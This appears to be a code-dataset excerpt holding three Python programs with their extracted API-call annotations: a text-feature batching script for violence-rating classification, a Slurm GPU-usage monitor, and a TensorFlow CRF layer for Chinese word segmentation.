10294), 'numpy.log10', 'np.log10', (['b'], {}), '(b)\n', (10291, 10294), True, 'import numpy as np\n')] |
from numpy.random import seed
seed(5393)
from tensorflow import set_random_seed
set_random_seed(12011)
import os
import numpy as np
import pandas as pd
from scipy import sparse
from sklearn.preprocessing import LabelEncoder, LabelBinarizer
from sklearn.pipeline import FeatureUnion
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.model_selection import train_test_split, StratifiedKFold
from joblib import Parallel, delayed
from tqdm import tqdm
import logging
logging.basicConfig(level = logging.INFO)
EMBED_DIM = 300
VOCAB_SIZE = 5000
max_len = 1000
batch_size = 16
n_folds = 5
fold_dir = "/data/victor/violence-workshop/batches/reversefolds"
data_pkl = "../../data/dataframe_with_scores_withdoc2vec.pkl"
def pad_csr(a, newshape):
""" Pads csr_matrix with zeros. Modifies a inplace. """
n, m = a.shape
a._shape = newshape
a.indptr = np.pad(a.indptr, (0, newshape[0] - n), 'edge')
def filter_nans(seq):
""" Filters out floats (np.nan) from list """
return np.array([x for x in seq if not isinstance(x, float)])
def pad_or_trim(seq, max_len=1000):
""" Pads or trims seq to have max_len rows """
n, m = seq.shape
if n > max_len:
seq = seq[-max_len:, :]
elif n < max_len:
if sparse.issparse(seq):
pad_csr(seq, (max_len, m))
else:
seq = np.r_[seq, np.zeros((max_len - n, m))]
return seq
def process_ngrams(batch_features, ngram_features):
""" Transform batch_features into tensor of dims:
(n, max_len, #features) where n is len(batch_features)"""
n = batch_features.shape[0]
batch_features = batch_features.apply(ngram_features.transform)\
.apply(pad_or_trim)
batch_features = sparse.vstack(batch_features)
batch_features = batch_features.toarray()\
.reshape(n, max_len, -1)
return batch_features
def process_scores(X):
""" Transforms X into tensor of dims:
(n, max_len, #features) where n is len(X).
This is a special case of process for lists of scores"""
batch_scores = X.apply(np.array)\
.apply(lambda x: x.reshape(-1, 1))\
.apply(pad_or_trim)
batch_scores = np.concatenate(batch_scores.values, axis = 0)\
.reshape(-1, max_len, 1)
return batch_scores
############################################################
# Load Data
############################################################
data = pd.read_pickle(data_pkl)
# Encode genre
lb_genre = LabelEncoder()
data['genre'] = lb_genre.fit_transform(data['genre'])
############################################################
# 3 to 5 chars w/ spaces
# unigrams + bigrams
############################################################
# This defines the analyzer to be used with Countvectorizer
def char_ngram_tokenizer(text, ngram_range):
def aux(text, ngram_size):
for i in range(len(text) - ngram_size):
yield text[i : i + ngram_size]
for n in range(*ngram_range):
for ngram in aux(text, n):
yield ngram
ngram_features = FeatureUnion([
("char_ngrams", CountVectorizer(analyzer = lambda text: char_ngram_tokenizer(text, ngram_range=(3, 6)),
max_features = VOCAB_SIZE)),
("token_ngrams", CountVectorizer(ngram_range=(1, 2),
max_features=VOCAB_SIZE))
])
tfidf_ = TfidfVectorizer(ngram_range=(1, 2), max_features=VOCAB_SIZE)
############################################################
# Batch generation
############################################################
def process(X, Y, i, ngram_features, batch_dir, tfidf_transformer = None):
# Features
## ngrams
#logging.info("ngrams")
#batch_ngrams = process_ngrams(X['sentences'].iloc[i : i + batch_size], ngram_features)
#np.savez(os.path.join(batch_dir, "{}_ngrams".format(i)),
# features = batch_ngrams)
#batch_ngrams = None
## tfidf
#logging.info("tfidf")
#batch_tfidf = process_ngrams(X['sentences'].iloc[i : i + batch_size], tfidf_transformer)
#np.savez(os.path.join(batch_dir, "{}_tfidf".format(i)),
# features = batch_tfidf)
#batch_tfidf = None
# ## Word2vec
#logging.info("word2vec")
#batch_word2vec = X['word2vec_sent_mean_vec'].iloc[i : i + batch_size]\
# .apply(filter_nans)\
# .apply(pad_or_trim)
#np.savez(os.path.join(batch_dir, "{}_word2vec".format(i)),
# features = batch_word2vec)
#batch_word2vec = None
# paragraph2vec
logging.info("paragraph2vec")
batch_paragraph2vec = X['doc2vec_vectors'].iloc[i : i + batch_size]\
.apply(filter_nans)\
.apply(pad_or_trim)
np.savez(os.path.join(batch_dir, "{}_doc2vec".format(i)),
features = batch_paragraph2vec)
batch_paragraph2vec = None
# ## Lexicons
#logging.info("Empath")
#batch_empath = X['empath_sentence'].iloc[i : i + batch_size]\
# .apply(np.array)\
# .apply(pad_or_trim)
#np.savez(os.path.join(batch_dir, "{}_empath".format(i)),
# empath = batch_empath)
#logging.info("Lexicons")
#batch_lexicon = process_scores(X['abusive_scores'].iloc[i : i + batch_size])
#batch_vader = process_scores(X['vader_scores'].iloc[i : i + batch_size])
#batch_afinn = process_scores(X['afinn_scores'].iloc[i : i + batch_size])
#batch_hatebase = X['hatebase_sentence'].iloc[i : i + batch_size].apply(pad_or_trim)
#np.savez(os.path.join(batch_dir, "{}_lexicon".format(i)),
# abusive_scores = batch_lexicon,
# vader = batch_vader,
# afinn = batch_afinn,
# hatebase = batch_hatebase)
# batch_lexicon = None
#batch_vader = None
#batch_afinn = None
#batch_hatebase = None
## Save labels
#logging.info("Labels")
#batch_labels = Y[i : i + batch_size]
#np.savez(os.path.join(batch_dir, "{}_labels".format(i)),
# labels = batch_labels)
## Save metadata
#logging.info("Metadata")
#batch_genre = X['genre'][i : i + batch_size]
#np.savez(os.path.join(batch_dir, "{}_meta".format(i)),
# genre = batch_genre)
logging.info("Done for {}".format(i))
skf = StratifiedKFold(n_splits = n_folds, random_state = 42)
lb = LabelBinarizer()
Y = lb.fit_transform(data['violence_rating'])
for k, (train, test) in enumerate(skf.split(data.violence_rating, data.violence_rating)):
train_dir = os.path.join(fold_dir, str(k), "train")
test_dir = os.path.join(fold_dir, str(k), "test")
eval_dir = os.path.join(fold_dir, str(k), "eval")
for t in [train_dir, test_dir, eval_dir]:
os.makedirs(t, exist_ok = True)
X_train, X_test = data.iloc[train], data.iloc[test]
Y_train, Y_test = Y[train], Y[test]
X_train, X_eval, Y_train, Y_eval = train_test_split(X_train, Y_train, test_size = 64, random_state = 666)
# Fit vocab
ngram_features.fit(data.iloc[train]['text'], Y_train)
tfidf_.fit(data.iloc[train]['text'], Y_train)
# Create batches
for i in tqdm(range(0, X_train.shape[0], batch_size)):
process(X_train, Y_train, i, ngram_features = ngram_features, batch_dir = train_dir, tfidf_transformer = tfidf_)
for i in tqdm(range(0, X_eval.shape[0], batch_size)):
process(X_eval, Y_eval, i, ngram_features = ngram_features, batch_dir = eval_dir, tfidf_transformer = tfidf_)
for i in tqdm(range(0, X_test.shape[0], batch_size)):
process(X_test, Y_test, i, ngram_features = ngram_features, batch_dir = test_dir, tfidf_transformer = tfidf_)
| [
"logging.basicConfig",
"pandas.read_pickle",
"sklearn.preprocessing.LabelEncoder",
"sklearn.preprocessing.LabelBinarizer",
"scipy.sparse.vstack",
"os.makedirs",
"sklearn.model_selection.train_test_split",
"sklearn.feature_extraction.text.CountVectorizer",
"scipy.sparse.issparse",
"sklearn.model_se... | [((30, 40), 'numpy.random.seed', 'seed', (['(5393)'], {}), '(5393)\n', (34, 40), False, 'from numpy.random import seed\n'), ((80, 102), 'tensorflow.set_random_seed', 'set_random_seed', (['(12011)'], {}), '(12011)\n', (95, 102), False, 'from tensorflow import set_random_seed\n'), ((509, 548), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (528, 548), False, 'import logging\n'), ((2543, 2567), 'pandas.read_pickle', 'pd.read_pickle', (['data_pkl'], {}), '(data_pkl)\n', (2557, 2567), True, 'import pandas as pd\n'), ((2595, 2609), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (2607, 2609), False, 'from sklearn.preprocessing import LabelEncoder, LabelBinarizer\n'), ((3525, 3585), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'ngram_range': '(1, 2)', 'max_features': 'VOCAB_SIZE'}), '(ngram_range=(1, 2), max_features=VOCAB_SIZE)\n', (3540, 3585), False, 'from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n'), ((6470, 6520), 'sklearn.model_selection.StratifiedKFold', 'StratifiedKFold', ([], {'n_splits': 'n_folds', 'random_state': '(42)'}), '(n_splits=n_folds, random_state=42)\n', (6485, 6520), False, 'from sklearn.model_selection import train_test_split, StratifiedKFold\n'), ((6530, 6546), 'sklearn.preprocessing.LabelBinarizer', 'LabelBinarizer', ([], {}), '()\n', (6544, 6546), False, 'from sklearn.preprocessing import LabelEncoder, LabelBinarizer\n'), ((901, 947), 'numpy.pad', 'np.pad', (['a.indptr', '(0, newshape[0] - n)', '"""edge"""'], {}), "(a.indptr, (0, newshape[0] - n), 'edge')\n", (907, 947), True, 'import numpy as np\n'), ((1781, 1810), 'scipy.sparse.vstack', 'sparse.vstack', (['batch_features'], {}), '(batch_features)\n', (1794, 1810), False, 'from scipy import sparse\n'), ((4746, 4775), 'logging.info', 'logging.info', (['"""paragraph2vec"""'], {}), "('paragraph2vec')\n", (4758, 4775), False, 'import logging\n'), ((7076, 7142), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_train', 'Y_train'], {'test_size': '(64)', 'random_state': '(666)'}), '(X_train, Y_train, test_size=64, random_state=666)\n', (7092, 7142), False, 'from sklearn.model_selection import train_test_split, StratifiedKFold\n'), ((6908, 6937), 'os.makedirs', 'os.makedirs', (['t'], {'exist_ok': '(True)'}), '(t, exist_ok=True)\n', (6919, 6937), False, 'import os\n'), ((1285, 1305), 'scipy.sparse.issparse', 'sparse.issparse', (['seq'], {}), '(seq)\n', (1300, 1305), False, 'from scipy import sparse\n'), ((2282, 2325), 'numpy.concatenate', 'np.concatenate', (['batch_scores.values'], {'axis': '(0)'}), '(batch_scores.values, axis=0)\n', (2296, 2325), True, 'import numpy as np\n'), ((3409, 3469), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {'ngram_range': '(1, 2)', 'max_features': 'VOCAB_SIZE'}), '(ngram_range=(1, 2), max_features=VOCAB_SIZE)\n', (3424, 3469), False, 'from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n'), ((1389, 1415), 'numpy.zeros', 'np.zeros', (['(max_len - n, m)'], {}), '((max_len - n, m))\n', (1397, 1415), True, 'import numpy as np\n')] |
#!/usr/bin/python3
# author mhakala
import json
import re
import subprocess
import tempfile
import os
import xml.etree.cElementTree as ET
import argparse
import os.path
import time
import random
from datetime import datetime
from datetime import timedelta
import traceback
import configparser
import glob
def jobs_running():
"""find slurm-job-ids active on this node"""
data = subprocess.check_output(['squeue', '-w', os.uname()[1].split('.')[0], '-h', '-o', '%A']).decode()
return data.split()
def pid2id(pid):
"""convert pid to slurm jobid"""
with open('/proc/%s/cgroup' % pid) as f:
for line in f:
m = re.search('.*slurm\/uid_.*\/job_(\d+)\/.*', line)
if m:
return m.group(1)
return None
# get needed slurm values for each running job on the node
def job_info(jobs,current):
for job in jobs:
output = subprocess.check_output(['scontrol', '-o', 'show', 'job', job]).decode()
cpus = re.search('NumCPUs=(\d+)', output)
tres = re.search('TRES=(\S+)', output).group(1)
nodes = re.search('NumNodes=(\d+)', output)
ngpu = 0
for g in tres.split(','):
gs = g.split('=')
if gs[0] == 'gres/gpu:tesla':
if len(gs) == 1:
ngpu = 1
else:
ngpu = int(gs[-1])
# drop multi-node jobs (will be added later if needed)
if int(nodes.group(1)) > 1:
del current[job]
else:
current[job]['ngpu'] = ngpu
current[job]['ncpu']=int(cpus.group(1))
return current
def gpu_info(jobinfo):
output = subprocess.check_output(['nvidia-smi', '-q', '-x']).decode()
root = ET.fromstring(output)
for gpu in root.findall('gpu'):
procs = gpu.find('processes')
mtot = 0.
jobid = None
# Here we assume that multiple job id's cannot access the same
# GPU
for pi in procs.findall('process_info'):
pid = pi.find('pid').text
jobid = pid2id(pid)
# Assume used_memory is of the form '1750 MiB'. Needs fixing
# if the unit is anything but MiB.
mtot += float(pi.find('used_memory').text.split()[0])
util = gpu.find('utilization')
# Here assume gpu utilization is of the form
# '100 %'
gutil = float(util.find('gpu_util').text.split()[0])
# power_draw is of the form 35.25 W
power = gpu.find('power_readings')
gpwrdraw = float(power.find('power_draw').text.split()[0])
# only update, if jobid not dropped (multinode jobs)
# if a job is using multiple GPUs, code below should execute again
if jobid in jobinfo.keys():
if jobinfo[jobid]['ngpu'] != 0:
jobinfo[jobid]['gpu_util'] += gutil/jobinfo[jobid]['ngpu']
jobinfo[jobid]['gpu_power'] += gpwrdraw
jobinfo[jobid]['gpu_mem_max'] = max(mtot,
jobinfo[jobid]['gpu_mem_max'])
return jobinfo
def read_shm(dir_name):
jobinfo = {}
for fpath in glob.glob(dir_name + '*.json'):
jobid = fpath.replace(dir_name, '').replace('.json', '')
with open(fpath, 'r') as fp:
jobinfo[jobid] = json.loads(fp.read())
return jobinfo
def write_shm(jobinfo, running_jobids, dir_path, max_age):
latest = datetime.now() - timedelta(days=max_age)
latest = latest.strftime("%Y-%m-%d %H:%M:%S")
for jobid in jobinfo:
fpath = dir_path + str(jobid) + '.json'
if jobid in running_jobids and jobinfo[jobid]['ngpu'] != 0:
with open(fpath, 'w') as fp:
json.dump(jobinfo[jobid], fp)
elif jobinfo[jobid]['timestamp'] < latest:
os.remove(fpath)
def dir_path(path):
if os.path.isdir(path):
return path
else:
raise argparse.ArgumentTypeError("readable_dir:" +
str(path) +
" is not a valid path")
def main():
start_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('dir_path',
type=dir_path,
nargs='?',
default='/tmp/gpu_stats/',
help="The directory where a JSON for each job is stored")
parser.add_argument('-n', '--nosleep',
help="Don't sleep at the beginning",
action="store_true")
parser.add_argument('-l',
'--logfile',
help="Name of log file where any exceptions will be written to",
default='/tmp/gpustats.log')
parser.add_argument('-m',
'--max-age',
type=int,
default=1,
help='The maximum time (in days) for which the gpu stats of a job will be stored')
args = parser.parse_args()
if args.dir_path[-1] != '/':
args.dir_path += '/'
logfile = open(args.logfile, 'a+')
try:
if not args.nosleep:
time.sleep(random.randint(0, 30))
# initialize stats
current = {}
jobs = jobs_running()
for job in jobs:
current[job]={'gpu_util': 0, 'gpu_mem_max': 0, 'ngpu': 0,
'ncpu': 0, 'step': 1, 'gpu_power': 0,
'timestamp':
datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
# get current job info
current = job_info(jobs, current)
current = gpu_info(current)
# running_jobids contains jobids of jobs that are running
# if a jobid is not in this set,
# then we don't need to write to the corresponding file
running_jobids = set(current.keys())
# combine with previous steps, calculate avgs and max
prev = read_shm(args.dir_path)
for job in jobs:
if job in prev.keys():
n = prev[job]['step']
current[job]['gpu_util'] = ( float(prev[job]['gpu_util'])*n+float(current[job]['gpu_util']) )/(n+1)
current[job]['gpu_power'] = ( float(prev[job]['gpu_power'])*n+float(current[job]['gpu_power']) )/(n+1)
current[job]['gpu_mem_max'] = max(float(prev[job]['gpu_mem_max']), float(current[job]['gpu_mem_max']))
current[job]['step'] = n+1
for job in prev.keys():
if job not in jobs:
# it must be a job that is no longer running
current[job] = prev[job]
# write json
write_shm(current, running_jobids, args.dir_path, args.max_age)
except Exception as e:
logfile.write(traceback.format_exc())
end_time = time.time()
if end_time - start_time > 55.0:
logfile.write("WARNING: runtime was longer than expected at " +
str(end_time - start_time) +
" seconds\n")
if __name__ == '__main__':
main()
| [
"subprocess.check_output",
"traceback.format_exc",
"os.uname",
"argparse.ArgumentParser",
"xml.etree.cElementTree.fromstring",
"json.dump",
"os.remove",
"datetime.datetime.now",
"os.path.isdir",
"datetime.timedelta",
"time.time",
"random.randint",
"glob.glob",
"re.search"
] | [((1741, 1762), 'xml.etree.cElementTree.fromstring', 'ET.fromstring', (['output'], {}), '(output)\n', (1754, 1762), True, 'import xml.etree.cElementTree as ET\n'), ((3161, 3191), 'glob.glob', 'glob.glob', (["(dir_name + '*.json')"], {}), "(dir_name + '*.json')\n", (3170, 3191), False, 'import glob\n'), ((3867, 3886), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (3880, 3886), False, 'import os\n'), ((4125, 4136), 'time.time', 'time.time', ([], {}), '()\n', (4134, 4136), False, 'import time\n'), ((4150, 4175), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4173, 4175), False, 'import argparse\n'), ((6873, 6884), 'time.time', 'time.time', ([], {}), '()\n', (6882, 6884), False, 'import time\n'), ((982, 1017), 're.search', 're.search', (['"""NumCPUs=(\\\\d+)"""', 'output'], {}), "('NumCPUs=(\\\\d+)', output)\n", (991, 1017), False, 'import re\n'), ((1092, 1128), 're.search', 're.search', (['"""NumNodes=(\\\\d+)"""', 'output'], {}), "('NumNodes=(\\\\d+)', output)\n", (1101, 1128), False, 'import re\n'), ((3438, 3452), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3450, 3452), False, 'from datetime import datetime\n'), ((3455, 3478), 'datetime.timedelta', 'timedelta', ([], {'days': 'max_age'}), '(days=max_age)\n', (3464, 3478), False, 'from datetime import timedelta\n'), ((648, 701), 're.search', 're.search', (['""".*slurm\\\\/uid_.*\\\\/job_(\\\\d+)\\\\/.*"""', 'line'], {}), "('.*slurm\\\\/uid_.*\\\\/job_(\\\\d+)\\\\/.*', line)\n", (657, 701), False, 'import re\n'), ((1669, 1720), 'subprocess.check_output', 'subprocess.check_output', (["['nvidia-smi', '-q', '-x']"], {}), "(['nvidia-smi', '-q', '-x'])\n", (1692, 1720), False, 'import subprocess\n'), ((892, 955), 'subprocess.check_output', 'subprocess.check_output', (["['scontrol', '-o', 'show', 'job', job]"], {}), "(['scontrol', '-o', 'show', 'job', job])\n", (915, 955), False, 'import subprocess\n'), ((1034, 1066), 're.search', 're.search', (['"""TRES=(\\\\S+)"""', 'output'], {}), "('TRES=(\\\\S+)', output)\n", (1043, 1066), False, 'import re\n'), ((3729, 3758), 'json.dump', 'json.dump', (['jobinfo[jobid]', 'fp'], {}), '(jobinfo[jobid], fp)\n', (3738, 3758), False, 'import json\n'), ((3822, 3838), 'os.remove', 'os.remove', (['fpath'], {}), '(fpath)\n', (3831, 3838), False, 'import os\n'), ((5220, 5241), 'random.randint', 'random.randint', (['(0)', '(30)'], {}), '(0, 30)\n', (5234, 5241), False, 'import random\n'), ((6833, 6855), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6853, 6855), False, 'import traceback\n'), ((5550, 5564), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5562, 5564), False, 'from datetime import datetime\n'), ((428, 438), 'os.uname', 'os.uname', ([], {}), '()\n', (436, 438), False, 'import os\n')] |
""" 参考自https://github.com/bojone/crf/ """
import tensorflow as tf
k = tf.keras
kl = tf.keras.layers
K = tf.keras.backend
from sklearn.model_selection import train_test_split
import numpy as np
import re
from tqdm import tqdm
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
class CRF(kl.Layer):
"""
CRF层本质上是一个带训练参数的loss计算层,因此CRF层只用来训练模型,
而预测则需要另外建立模型。
"""
def __init__(self, ignore_last_label=False, lr_mult=1., **kwargs):
"""ignore_last_label:定义要不要忽略最后一个标签,起到mask的效果
"""
super().__init__(**kwargs)
self.ignore_last_label = 1 if ignore_last_label else 0
self.lr_mult = lr_mult
def build(self, input_shape):
self.num_labels = input_shape[-1] - self.ignore_last_label
self._trans: tf.Variable = self.add_weight(name='crf_trans',
shape=(self.num_labels, self.num_labels),
initializer='glorot_uniform',
trainable=True)
self._trans.assign(self._trans / self.lr_mult)
self.trans = lambda: self._trans * self.lr_mult
def get_weights(self):
weights = super().get_weights()
return [w * self.lr_mult for w in weights]
def log_norm_step(self, inputs, states):
"""递归计算归一化因子
要点:1、递归计算;2、用logsumexp避免溢出。
技巧:通过expand_dims来对齐张量。
"""
inputs, mask = inputs[:, :-1], inputs[:, -1:]
states = K.expand_dims(states[0], 2) # (batch_size, output_dim, 1)
trans = K.expand_dims(self.trans(), 0) # (1, output_dim, output_dim)
outputs = tf.math.reduce_logsumexp(states + trans, 1) # (batch_size, output_dim)
outputs = outputs + inputs
outputs = mask * outputs + (1 - mask) * states[:, :, 0]
return outputs, [outputs]
def path_score(self, inputs, labels):
"""计算目标路径的相对概率(还没有归一化)
要点:逐标签得分,加上转移概率得分。
技巧:用“预测”点乘“目标”的方法抽取出目标路径的得分。
"""
point_score = K.sum(K.sum(inputs * labels, 2), 1, keepdims=True) # 逐标签得分
labels1 = K.expand_dims(labels[:, :-1], 3)
labels2 = K.expand_dims(labels[:, 1:], 2)
labels = labels1 * labels2 # 两个错位labels,负责从转移矩阵中抽取目标转移得分
trans = K.expand_dims(K.expand_dims(self.trans(), 0), 0)
trans_score = K.sum(K.sum(trans * labels, [2, 3]), 1, keepdims=True)
return point_score + trans_score # 两部分得分之和
def call(self, inputs): # CRF本身不改变输出,它只是一个loss
return inputs
def loss(self, y_true, y_pred): # 目标y_pred需要是one hot形式
if self.ignore_last_label:
mask = 1 - y_true[:, :, -1:]
else:
mask = K.ones_like(y_pred[:, :, :1])
y_true, y_pred = y_true[:, :, :self.num_labels], y_pred[:, :, :self.num_labels]
path_score = self.path_score(y_pred, y_true) # 计算分子(对数)
init_states = [y_pred[:, 0]] # 初始状态
y_pred = K.concatenate([y_pred, mask])
log_norm, _, _ = K.rnn(self.log_norm_step, y_pred[:, 1:], init_states) # 计算Z向量(对数)
log_norm = tf.math.reduce_logsumexp(log_norm, 1, keepdims=True) # 计算Z(对数)
return log_norm - path_score # 即log(分子/分母)
def accuracy(self, y_true, y_pred): # 训练过程中显示逐帧准确率的函数,排除了mask的影响
mask = 1 - y_true[:, :, -1] if self.ignore_last_label else None
y_true, y_pred = y_true[:, :, :self.num_labels], y_pred[:, :, :self.num_labels]
isequal = K.equal(K.argmax(y_true, 2), K.argmax(y_pred, 2))
isequal = K.cast(isequal, 'float32')
if mask == None:
return K.mean(isequal)
else:
return K.sum(isequal * mask) / K.sum(mask)
def max_in_dict(d): # 定义一个求字典中最大值的函数
dict_items = list(d.items())
key, value = dict_items[0]
for i, j in dict_items[1:]:
if j > value:
key, value = i, j
return key, value
def viterbi(nodes, trans): # viterbi算法,跟前面的HMM一致
paths = nodes[0] # 初始化起始路径
for l in range(1, len(nodes)): # 遍历后面的节点
paths_old, paths = paths, {}
for n, ns in nodes[l].items(): # 当前时刻的所有节点
max_path, max_score = '', -1e10
for p, ps in paths_old.items(): # 截止至前一时刻的最优路径集合
score = ns + ps + trans[p[-1] + n] # 计算新分数
if score > max_score: # 如果新分数大于已有的最大分
max_path, max_score = p + n, score # 更新路径
paths[max_path] = max_score # 储存到当前时刻所有节点的最优路径
return max_in_dict(paths)
def cut(s, trans, char2id): # 分词函数,也跟前面的HMM基本一致
if not s: # 空字符直接返回
return []
# 字序列转化为id序列。注意,经过我们前面对语料的预处理,字符集是没有空格的,
# 所以这里简单将空格的id跟句号的id等同起来
sent_ids = np.array([[char2id.get(c, 0) if c != ' ' else char2id[u'。']
for c in s]])
probas = model.predict(sent_ids)[0] # [n,5]
nodes = [dict(zip('sbme', i)) for i in probas[:, :4]] # 只取前4个,因为最后一个是mask
nodes[0] = {i: j for i, j in nodes[0].items() if i in 'bs'} # 首字标签只能是b或s
nodes[-1] = {i: j for i, j in nodes[-1].items() if i in 'es'} # 末字标签只能是e或s
tags = viterbi(nodes, trans)[0]
result = [s[0]]
for i, j in zip(s[1:], tags[1:]):
if j in 'bs': # 词的开始
result.append(i)
else: # 接着原来的词
result[-1] += i
return result
class Evaluate(k.callbacks.Callback):
def __init__(self, tag2id, char2id):
self.highest = 0.
self.tag2id = tag2id
self.char2id = char2id
self.history = []
def on_train_batch_end(self, batch, logs=None):
A = self.model.get_layer('crf').get_weights()[0][:4, :4] # 从训练模型中取出最新得到的转移矩阵
self.history.append(A)
# def on_epoch_end(self, epoch, logs=None):
# A = self.model.get_weights()[-1][:4, :4] # 从训练模型中取出最新得到的转移矩阵
# trans = {}
# for i in 'sbme':
# for j in 'sbme':
# trans[i + j] = A[self.tag2id[i], self.tag2id[j]]
# right = 0.
# total = 0.
# for s in tqdm(iter(valid_sents), desc=u'验证模型中'):
# result = cut(''.join(s), trans, self.char2id)
# total += len(set(s))
# right += len(set(s) & set(result)) # 直接将词集的交集作为正确数。该指标比较简单,
# # 也许会导致估计偏高。读者可以考虑自定义指标
# acc = right / total
# if acc > self.highest:
# self.highest = acc
# print('val acc: %s, highest: %s' % (acc, self.highest))
def show_anime(self, save_path='gif/crf.gif'):
fig, ax = plt.subplots()
fig.set_tight_layout(True)
ax: plt.Axes
A = self.history[0]
c = ax.pcolor(A, cmap='RdBu_r', vmin=A.min(), vmax=A.max(),
edgecolors='w', linewidths=30)
ax.set_xticks(np.arange(4) + 0.5)
ax.set_yticks(np.arange(4) + 0.5)
ax.set_xticklabels(list('sbme'))
ax.set_yticklabels(list('sbme'))
for i in range(4):
for j in range(4):
text = ax.text(j + 0.5, i + 0.5,
f'{A[i, j]:^4.2f}',
ha="center", va="center", color="w")
def update(t):
ax.cla()
ax.set_title(f'iter {t}')
ax.set_xticks(np.arange(4) + 0.5)
ax.set_yticks(np.arange(4) + 0.5)
ax.set_xticklabels(list('sbme'))
ax.set_yticklabels(list('sbme'))
A = self.history[t]
c = ax.pcolor(A, cmap='RdBu_r', vmin=A.min(), vmax=A.max(),
edgecolors='w', linewidths=30)
for i in range(4):
for j in range(4):
text = ax.text(j + 0.5, i + 0.5,
f'{A[i, j]:^4.2f}',
ha="center", va="center", color="w")
anim = FuncAnimation(fig, update, frames=len(self.history), interval=100)
anim.save(save_path, writer='imagemagick', fps=5)
plt.show()
if __name__ == "__main__":
physical_devices = tf.config.experimental.list_physical_devices('GPU')
assert len(physical_devices) > 0, "Not enough GPU hardware devices available"
tf.config.experimental.set_memory_growth(physical_devices[0], True)
sents = []
with open('CRF/msr_training.utf8', 'r') as f:
for line in f.readlines():
sents.append(line.strip())
sents = [re.split(' +', s) for s in sents] # 词之间以空格隔开
sents = [[w for w in s if w] for s in sents] # 去掉空字符串
np.random.shuffle(sents) # 打乱语料,以便后面划分验证集
chars = {} # 统计字表
for s in sents:
for c in ''.join(s):
if c in chars:
chars[c] += 1
else:
chars[c] = 1
# 过滤低频字
min_count = 2
chars = {i: j for i, j in chars.items() if j >= min_count}
id2char = {i + 1: j for i, j in enumerate(chars)} # id到字的映射
char2id = {j: i for i, j in id2char.items()} # 字到id的映射
id2tag = {0: 's', 1: 'b', 2: 'm', 3: 'e'} # 标签(sbme)与id之间的映射
tag2id = {j: i for i, j in id2tag.items()}
train_sents, valid_sents = train_test_split(sents, test_size=0.05)
batch_size = 128
def train_generator():
while True:
X, Y = [], []
for i, s in enumerate(train_sents): # 遍历每个句子
sx, sy = [], []
for w in s: # 遍历句子中的每个词
sx.extend([char2id.get(c, 0) for c in w]) # 遍历词中的每个字
if len(w) == 1:
sy.append(0) # 单字词的标签
elif len(w) == 2:
sy.extend([1, 3]) # 双字词的标签
else:
sy.extend([1] + [2] * (len(w) - 2) + [3]) # 多于两字的词的标签
X.append(sx)
Y.append(sy)
if len(X) == batch_size or i == len(train_sents) - 1: # 如果达到一个batch
maxlen = max([len(x) for x in X]) # 找出最大字数
X = [x + [0] * (maxlen - len(x)) for x in X] # 不足则补零
Y = [y + [4] * (maxlen - len(y)) for y in Y] # 不足则补第五个标签
yield np.array(X), tf.keras.utils.to_categorical(Y, 5)
X, Y = [], []
embedding_size = 128
sequence = kl.Input(shape=(None,), dtype='int32') # 建立输入层,输入长度设为None
embedding = kl.Embedding(len(chars) + 1, embedding_size)(sequence) # 去掉了mask_zero=True
cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(embedding)
cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(cnn)
cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(cnn) # 层叠了3层CNN
crf = CRF(True, lr_mult=100.) # 定义crf层,参数为True,自动mask掉最后一个标签,同时增大crf学习率100倍
tag_score = kl.Dense(5)(cnn) # 变成了5分类,第五个标签用来mask掉
tag_score = crf(tag_score) # 包装一下原来的tag_score
model = k.Model(inputs=sequence, outputs=tag_score)
model.summary()
model.compile(loss=crf.loss, # 用crf自带的loss
optimizer=k.optimizers.Adam(0.001),
metrics=[crf.accuracy] # 用crf自带的accuracy
)
evaluator = Evaluate(tag2id, char2id)
model.fit_generator(train_generator(),
steps_per_epoch=100,
epochs=1,
callbacks=[evaluator]) # 训练并将evaluator加入到训练过程
A = model.get_layer('crf').get_weights()[0][:4, :4] # :4是为了去除mask的转义概率
trans = {}
for i in 'sbme':
for j in 'sbme':
trans[i + j] = A[tag2id[i], tag2id[j]]
right = 0.
total = 0.
for s in range(5):
s = valid_sents[s]
result = cut(''.join(s), trans, char2id)
print(''.join(s), '\n', result)
evaluator.show_anime()
| [
"re.split",
"tensorflow.keras.utils.to_categorical",
"matplotlib.pyplot.show",
"tensorflow.config.experimental.set_memory_growth",
"sklearn.model_selection.train_test_split",
"numpy.array",
"tensorflow.config.experimental.list_physical_devices",
"tensorflow.math.reduce_logsumexp",
"matplotlib.pyplot... | [((7282, 7333), 'tensorflow.config.experimental.list_physical_devices', 'tf.config.experimental.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (7326, 7333), True, 'import tensorflow as tf\n'), ((7416, 7483), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (7456, 7483), True, 'import tensorflow as tf\n'), ((7726, 7750), 'numpy.random.shuffle', 'np.random.shuffle', (['sents'], {}), '(sents)\n', (7743, 7750), True, 'import numpy as np\n'), ((8258, 8297), 'sklearn.model_selection.train_test_split', 'train_test_split', (['sents'], {'test_size': '(0.05)'}), '(sents, test_size=0.05)\n', (8274, 8297), False, 'from sklearn.model_selection import train_test_split\n'), ((1581, 1624), 'tensorflow.math.reduce_logsumexp', 'tf.math.reduce_logsumexp', (['(states + trans)', '(1)'], {}), '(states + trans, 